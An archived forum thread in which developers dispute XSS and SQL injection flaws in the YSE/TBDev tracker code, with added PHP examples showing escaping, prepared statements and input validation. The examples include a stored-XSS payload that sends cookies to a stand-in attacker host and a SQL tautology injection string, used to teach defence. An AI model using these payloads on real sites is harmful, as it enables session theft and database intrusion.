Bravo List

YSE v2.0 PRE6 (http://www.bvlist.com/showthread.php?t=2886)

Ashur 27th June 2009 16:59

YSE v2.0 PRE6
 
Yep, I just went on the YSE site and found there is
YSE v2.0 (18.05.07) Pre 6 RC 0 (update 13.07.09)


Translated with GOOGLE:
Quote:

Well

FILES only for those people who have signed up for an account and activated their account BY MAIL!

26.04.09
Delete files + fix security forum.
Wait footprint. update - deletion of integration with the forum.

09.07.09
Fixed bug associated with ban ip and its conversion to 127.255.255.255

13.07.09
A little edit, a partial de-integration of the forum, minor edits.
Maybe this is not significant, but just letting you know :D

cheers

kp380lv 27th June 2009 19:15

There are still many security holes in this updated version...

Gerxx13 20th July 2009 17:26

Is this version in Russian or English? :sos:
EDIT:
In Russian, no thanks :D

AlaminT 27th July 2009 15:05

Quote:

Originally Posted by kp380lv (Post 12733)
There are still many security holes in this updated version...

I think you have a bit of a prejudiced view ;)

HAVE you REALLY checked? :) If so, post the bugs and they will be fixed.

to TS: TBDev v2.0 (18.05.07) Pre 6 RC 0 (update 13.07.09) :P

kp380lv 27th July 2009 18:16

lol
 
AlaminT

OK, you say that this version is very safe!? No, you know the truth, there are still holes. Why don't you just fix them if you are so smart?

Holes and security vulnerabilities:

news.php
details.php
modtask.php
userdetails.php and so I can continue... other files also have holes or security vulnerabilities... I posted only a few file names where the problems are, but anyway I say that there are still security problems...

AlaminT 29th July 2009 10:10

oh, details? really?

news - you mean XSS in title or returnto? :)
modtask
userdetails

I think what you are posting is not holes. Post, please, go on, post...

kp380lv 29th July 2009 13:56

AlaminT

news.php

Code:

$body = $_POST["body"];
should be:

Code:

$body = htmlspecialchars($_POST["body"],ENT_QUOTES);
I hope you understand what I'm talking about..

AlaminT 29th July 2009 22:07

useless:

block-news.php:

Code:

format_comment($array['body'])
why?

PHP Code:

function format_comment($text, $strip_html = true) {
    $s = $text;                        // assignment omitted in the post as quoted
    if ($strip_html)
        $s = htmlspecialchars_uni($s); // YSE/TBDev helper wrapping htmlspecialchars()
    // ... (rest of the function not quoted in the post)

so there is NO VULNERABILITY, and your "fix" will only "break" things: "&" in the text will become "&amp;", e.g. you write "Command & Conquer 3" in the news, and it instead writes out "Command &amp; Conquer 3"
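
Editor's added example (not code from YSE, TBDev or either poster) to make the escaping argument above concrete. It models the two files being argued about: news.php storing the body and block-news.php printing it through format_comment(). It stubs a minimal format_comment() and assumes YSE's htmlspecialchars_uni() escapes like htmlspecialchars() with ENT_QUOTES (the real helper is not on this page). It shows that escaping once at output already neutralises a script tag, that escaping at input as well double-encodes "&", and what the output looks like with no escaping at all.

```php
<?php
// Added example, not YSE code: models news.php (store) and block-news.php (display).
// Assumption: YSE's htmlspecialchars_uni() escapes like htmlspecialchars() with ENT_QUOTES.
function htmlspecialchars_uni(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
}

// Minimal stand-in for YSE's format_comment(): escape first, then apply markup.
function format_comment(string $text, bool $strip_html = true): string {
    $s = $text;
    if ($strip_html) {
        $s = htmlspecialchars_uni($s);
    }
    return nl2br($s);
}

// Three storage/display paths for one news body.
function render_paths(string $raw): array {
    return [
        // 1. store raw, escape once at output (what block-news.php already does)
        'output_escaped' => format_comment($raw),
        // 2. the proposed news.php "fix" plus the existing output escaping
        'double_escaped' => format_comment(htmlspecialchars($raw, ENT_QUOTES, 'UTF-8')),
        // 3. no escaping anywhere: what an actual hole would look like
        'unescaped'      => format_comment($raw, false),
    ];
}

// Constructed bodies: a benign title containing '&', and a stored-XSS payload.
$bodies = [
    'Command & Conquer 3 added',
    "<script>new Image().src='http://attacker.example/?c='+document.cookie</script>",
];

foreach ($bodies as $raw) {
    echo "raw: $raw\n";
    foreach (render_paths($raw) as $path => $html) {
        printf("  %-15s %s\n", $path, $html);
    }
    echo "\n";
}
```

Run it with the php CLI. Path 1 turns the script tag into `&lt;script&gt;...` and "&" into `&amp;`, which the browser renders as "&". Path 2 stacks the proposed input escaping on top and emits `&amp;amp;`, which the browser then shows literally as "&amp;". Path 3, with the output escaping switched off, is the only one that emits the script tag intact.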

kp380lv 30th July 2009 10:53

Are you sure?

details.php

PHP Code:

$id = $_GET["id"];

should be:

PHP Code:

$id = (int) $_GET["id"]; 

So there is security vulnerabilities...

Or better change this to:

PHP Code:

if (!is_valid_id($_GET['id']))
    stderr($tracker_lang['error'], $tracker_lang['invalid_id']);
$id = (int) $_GET["id"];


Bigjoos 30th July 2009 12:01

kp380lv, I thought you would have picked up on this after we told you on Tbdev about the exact same stuff. The body you post about is under format_comment, like said, so learn to look deeper at code.

You say

0 + should be (int) ? - Again i dont agree there as they both do pretty much the same job :)

Again you're pushing an issue that's going to bite you in the arse. Go back to a test code and start learning. Funny thing is all these so-called exploits.. I'd like to see the people that claim there's an exploit actually craft one and do damage. 90% of it is all talk.

BoLaMN 30th July 2009 12:38

Dont Mind Him!
 
Don't mind kp380lv, he will release his Nehalem and everyone will complain about bugs in that lol..

Hey AlaminT, are you still working on pre7 or is it dead code to you?
I would love to see if I can help at any stage.

Regards BoLaMN

kp380lv 30th July 2009 19:58

lol
 
BoLaMN

You don't know NOTHING about Nehalem...so keep your mouth...*****.

Bigjoos, no offence, but you ask questions like a kid.. in my opinion safer is better and that's all..

In simpaty.php there is XSS..

PHP Code:

$type = $_GET['type'];

better..

PHP Code:

$type = htmlentities($_GET['type']);

users.php
PHP Code:

$search = trim($_GET['search']);

better should be..

PHP Code:

$search = htmlentities(trim($_GET['search']));

XSS possibility when having moderator rights... so it's NOT safe source CODE!


UPDATE:

message.php

PHP Code:

$from_is = unesc($_POST['pmees']);

should change to:

PHP Code:

$from_is = mysql_real_escape_string(unesc($_POST['pmees']));

This also in message.php

PHP Code:

$n_pms $_POST['n_pms'];
$comment $_POST['comment']; 

Change to:

PHP Code:


$n_pms = (int) $_POST['n_pms'];
$comment = (string) $_POST['comment'];

XSS + SQL injection...
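
Editor's added example (not code from YSE or from the poster) illustrating the message.php point: the same 'pmees' value sent through a concatenated query and through a prepared statement. It uses an in-memory SQLite database via PDO so it runs offline (needs the pdo_sqlite extension); YSE's unesc() is not on this page, so it is assumed here to be a no-op with magic quotes off. The prepared statement is a stand-in for the mysql_real_escape_string() fix proposed above: both keep the value out of the SQL text, the prepared statement without depending on the connection's charset.

```php
<?php
// Added example, not YSE code: models message.php looking up a sender name taken
// from $_POST['pmees'], first with string concatenation, then with a bound parameter.
// Runs against an in-memory SQLite database (requires pdo_sqlite).

// Stand-in for YSE's unesc(): assumed to be a no-op when magic_quotes is off.
function unesc(string $x): string {
    return $x;
}

function build_db(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, passhash TEXT)');
    // Constructed sample rows.
    $db->exec("INSERT INTO users VALUES (1, 'alice', 'hash-a'), (2, 'bob', 'hash-b'), (3, 'admin', 'hash-root')");
    return $db;
}

// Unsafe pattern: the request value is spliced into the SQL text.
function lookup_concat(PDO $db, string $pmees): array {
    $from_is = unesc($pmees);
    $sql = "SELECT id, username FROM users WHERE username = '" . $from_is . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Safe pattern: the value travels as a bound parameter, never as SQL.
function lookup_prepared(PDO $db, string $pmees): array {
    $from_is = unesc($pmees);
    $stmt = $db->prepare('SELECT id, username FROM users WHERE username = ?');
    $stmt->execute([$from_is]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$db = build_db();

// Constructed inputs: a normal name and a classic tautology injection.
$inputs = ['bob', "x' OR '1'='1"];

foreach ($inputs as $pmees) {
    $c = lookup_concat($db, $pmees);
    $p = lookup_prepared($db, $pmees);
    printf("input %-16s concat -> %d row(s), prepared -> %d row(s)\n",
        json_encode($pmees), count($c), count($p));
}
```

With the constructed rows, 'bob' matches one row either way, while the injected value makes the concatenated WHERE clause read `username = 'x' OR '1'='1'` and return every user; the prepared statement compares the whole string literally and returns nothing. The `(int)` cast proposed for `n_pms` is the same idea for a numeric field: the value reaches the query as a number, not as text.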

AlaminT 30th July 2009 20:52

agree - 0 + ... vs (int) = nothing, cos those path exposures - it's shitty, just talk, NOTHING serious

USERS.PHP

print("Поиск: htmlspecialchars($search)."\">\n");

YOU ARE BLIND

simpaty.php, message.php

yes, agree

kp380lv 30th July 2009 20:54

AlaminT

Lol then print vs echo also "has no difference":D

AlaminT 30th July 2009 21:18

practicaly - no difference, except print is a function and returns TRUE, and echo params like works faster than

kp380lv 30th July 2009 21:53

AlaminT - So please include these updates in the next version..

AlaminT 30th July 2009 22:12

if I don't forget...

kp380lv 10th August 2009 10:21

Also don't forget this fix in testport.php in the next YSE version - there is an XSS

PHP Code:

if (isset($_POST["port"]))   // condition not quoted in the post; isset() assumed here
    $port = $_POST["port"];
else
    $port = $_GET['port'];

replace with this..

PHP Code:

if (isset($_POST["port"]))   // condition not quoted in the post; isset() assumed here
    $port = (int) $_POST["port"];
else
    $port = (int) $_GET['port'];

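Editor's added example (not code from YSE or from the poster) showing what the (int) cast proposed for testport.php does and does not do: it strips a reflected script tag because the cast keeps only the leading digits, but it also turns garbage into 0 and passes out-of-range numbers through unchanged. The helpers valid_port() and is_valid_id() are hypothetical; is_valid_id() follows the idea of the function named earlier in the thread, but is written here because YSE's own is not on this page.

```php
<?php
// Added example, not YSE code: compares the bare (int) cast with range validation
// for request values like testport.php's 'port' and details.php's 'id'.

// Hypothetical helper in the spirit of the is_valid_id() named earlier in the
// thread: digits only, no leading zero, at most 10 digits.
function is_valid_id(string $id): bool {
    return (bool) preg_match('/^[1-9][0-9]{0,9}$/', $id);
}

// Hypothetical helper: the port as int when it is a usable TCP port, otherwise null.
function valid_port(string $port): ?int {
    $p = filter_var($port, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 1, 'max_range' => 65535],
    ]);
    return $p === false ? null : $p;
}

// Output escaping still applies when the value is echoed back into HTML.
function render_port(int $port): string {
    return 'Testing port ' . htmlspecialchars((string) $port, ENT_QUOTES, 'UTF-8');
}

// Constructed request values, benign and hostile.
$samples = ['6881', '0', '65536', '-1', 'abc', '1 OR 1=1',
            '80<script>alert(1)</script>'];

foreach ($samples as $raw) {
    $cast = (int) $raw;        // what (int) $_GET['port'] gives: garbage becomes 0 or a prefix
    $port = valid_port($raw);  // null unless 1..65535
    printf("%-34s (int)=%-6d port=%-7s id=%s\n",
        json_encode($raw),
        $cast,
        $port === null ? 'reject' : (string) $port,
        is_valid_id($raw) ? 'ok' : 'reject');
    if ($port !== null) {
        echo '    ' . render_port($port) . "\n";
    }
}
```

The cast alone already stops the reflected script, since `(int) '80<script>alert(1)</script>'` is 80; the range check is what rejects 0, negative values and anything above 65535, which the cast would hand on to the port test unchanged.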

Moh.ElBaz 11th September 2009 17:25

That's great, kp380lv.

I think we can stay away from disputes and take it as a discussion to find holes and bugs and fix them.



Powered by vBulletin® Version 3.8.11 Beta 3
Copyright ©2000 - 2024, vBulletin Solutions Inc.